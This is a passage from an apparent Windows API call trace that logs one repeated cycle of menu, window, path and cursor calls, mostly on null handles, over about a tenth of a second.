GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.351] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.351] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.351] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.351] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.351] GetStockObject (i=6) returned 0x1b00018 [0176.351] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.351] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.351] PathFileExistsW (pszPath=0x0) returned 0 [0176.351] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.351] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.351] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.351] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.351] GetMenu (hWnd=0x0) returned 0x0 [0176.351] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.352] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.352] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.352] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.352] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.352] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.352] GetStockObject (i=6) returned 0x1b00018 [0176.352] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.352] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.352] PathFileExistsW (pszPath=0x0) returned 0 [0176.352] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.352] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.352] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.352] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.352] GetMenu (hWnd=0x0) returned 0x0 [0176.352] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.352] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.352] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.352] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.352] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.352] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.352] GetStockObject (i=6) returned 0x1b00018 [0176.352] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.352] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.352] PathFileExistsW (pszPath=0x0) returned 0 [0176.352] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.352] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.352] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.352] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.352] GetMenu (hWnd=0x0) returned 0x0 [0176.352] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x34f) returned -1 [0176.445] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.445] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.445] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.445] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.445] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.445] GetStockObject (i=6) returned 0x1b00018 [0176.445] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.445] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.445] PathFileExistsW (pszPath=0x0) returned 0 [0176.445] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.445] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.445] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.445] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.446] GetMenu (hWnd=0x0) returned 0x0 [0176.446] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x174) returned -1 [0176.446] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.446] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.446] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.446] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.446] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.446] GetStockObject (i=6) returned 0x1b00018 [0176.446] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.446] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.446] PathFileExistsW (pszPath=0x0) returned 0 [0176.446] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.446] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.446] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.446] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.446] GetMenu (hWnd=0x0) returned 0x0 [0176.446] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.446] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.446] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.446] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.446] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.446] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.446] GetStockObject (i=6) returned 0x1b00018 [0176.446] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.446] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.446] PathFileExistsW (pszPath=0x0) returned 0 [0176.446] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.446] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.446] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.446] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.446] GetMenu (hWnd=0x0) returned 0x0 [0176.446] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x353) returned -1 [0176.446] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.446] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.447] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.447] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.447] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.447] GetStockObject (i=6) returned 0x1b00018 [0176.447] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.447] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.447] PathFileExistsW (pszPath=0x0) returned 0 [0176.447] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.447] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.447] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.447] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.447] GetMenu (hWnd=0x0) returned 0x0 [0176.447] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.447] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.447] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.447] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.447] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.447] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.447] GetStockObject (i=6) returned 0x1b00018 [0176.447] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.447] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.447] PathFileExistsW (pszPath=0x0) returned 0 [0176.447] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.447] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.447] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.447] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.447] GetMenu (hWnd=0x0) returned 0x0 [0176.447] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x355) returned -1 [0176.447] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.447] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.447] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.447] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.447] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.447] GetStockObject (i=6) returned 0x1b00018 [0176.448] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.448] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.448] PathFileExistsW (pszPath=0x0) returned 0 [0176.448] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.448] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.448] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.448] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.448] GetMenu (hWnd=0x0) returned 0x0 [0176.448] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x19a) returned -1 [0176.448] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.448] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.448] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.448] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.448] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.448] GetStockObject (i=6) returned 0x1b00018 [0176.448] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.448] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.448] PathFileExistsW (pszPath=0x0) returned 0 [0176.448] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.448] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.448] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.448] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.448] GetMenu (hWnd=0x0) returned 0x0 [0176.448] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.448] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.448] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.448] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.448] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.448] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.448] GetStockObject (i=6) returned 0x1b00018 [0176.448] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.448] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.448] PathFileExistsW (pszPath=0x0) returned 0 [0176.448] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.449] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.449] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.449] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.449] GetMenu (hWnd=0x0) returned 0x0 [0176.449] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x353) returned -1 [0176.449] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.449] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.449] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.449] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.449] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.449] GetStockObject (i=6) returned 0x1b00018 [0176.449] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.449] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.449] PathFileExistsW (pszPath=0x0) returned 0 [0176.449] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.449] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.449] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.449] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.449] GetMenu (hWnd=0x0) returned 0x0 [0176.449] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.449] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.449] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.449] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.449] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.449] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.449] GetStockObject (i=6) returned 0x1b00018 [0176.449] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.449] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.449] PathFileExistsW (pszPath=0x0) returned 0 [0176.449] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.449] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.449] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.449] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.449] GetMenu (hWnd=0x0) returned 0x0 [0176.450] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x355) returned -1 [0176.450] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.450] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.450] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.450] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.450] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.450] GetStockObject (i=6) returned 0x1b00018 [0176.450] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.450] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.450] PathFileExistsW (pszPath=0x0) returned 0 [0176.450] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.450] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.450] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.450] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.450] GetMenu (hWnd=0x0) returned 0x0 [0176.450] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x196) returned -1 [0176.450] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.450] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.450] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.450] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.450] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.450] GetStockObject (i=6) returned 0x1b00018 [0176.450] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.450] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.450] PathFileExistsW (pszPath=0x0) returned 0 [0176.450] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.450] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.450] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.450] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.450] GetMenu (hWnd=0x0) returned 0x0 [0176.450] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.450] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.450] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.450] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.450] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.451] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.451] GetStockObject (i=6) returned 0x1b00018 [0176.451] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.451] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.451] PathFileExistsW (pszPath=0x0) returned 0 [0176.451] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.451] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.451] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.451] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.451] GetMenu (hWnd=0x0) returned 0x0 [0176.451] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x354) returned -1 [0176.451] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.451] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.451] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.451] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.451] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.451] GetStockObject (i=6) returned 0x1b00018 [0176.451] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.451] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.451] PathFileExistsW (pszPath=0x0) returned 0 [0176.451] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.451] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.451] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.451] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.451] GetMenu (hWnd=0x0) returned 0x0 [0176.451] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.451] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.451] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.451] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.451] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.451] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.451] GetStockObject (i=6) returned 0x1b00018 [0176.451] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.451] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.452] PathFileExistsW (pszPath=0x0) returned 0 [0176.452] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.452] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.452] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.452] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.452] GetMenu (hWnd=0x0) returned 0x0 [0176.452] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x354) returned -1 [0176.452] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.452] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.452] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.452] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.452] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.452] GetStockObject (i=6) returned 0x1b00018 [0176.452] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.452] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.452] PathFileExistsW (pszPath=0x0) returned 0 [0176.452] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.452] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.452] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.452] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.452] GetMenu (hWnd=0x0) returned 0x0 [0176.452] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x2ff) returned -1 [0176.452] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.452] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.452] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.452] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.452] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.452] GetStockObject (i=6) returned 0x1b00018 [0176.452] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.452] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.452] PathFileExistsW (pszPath=0x0) returned 0 [0176.452] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.452] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.452] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 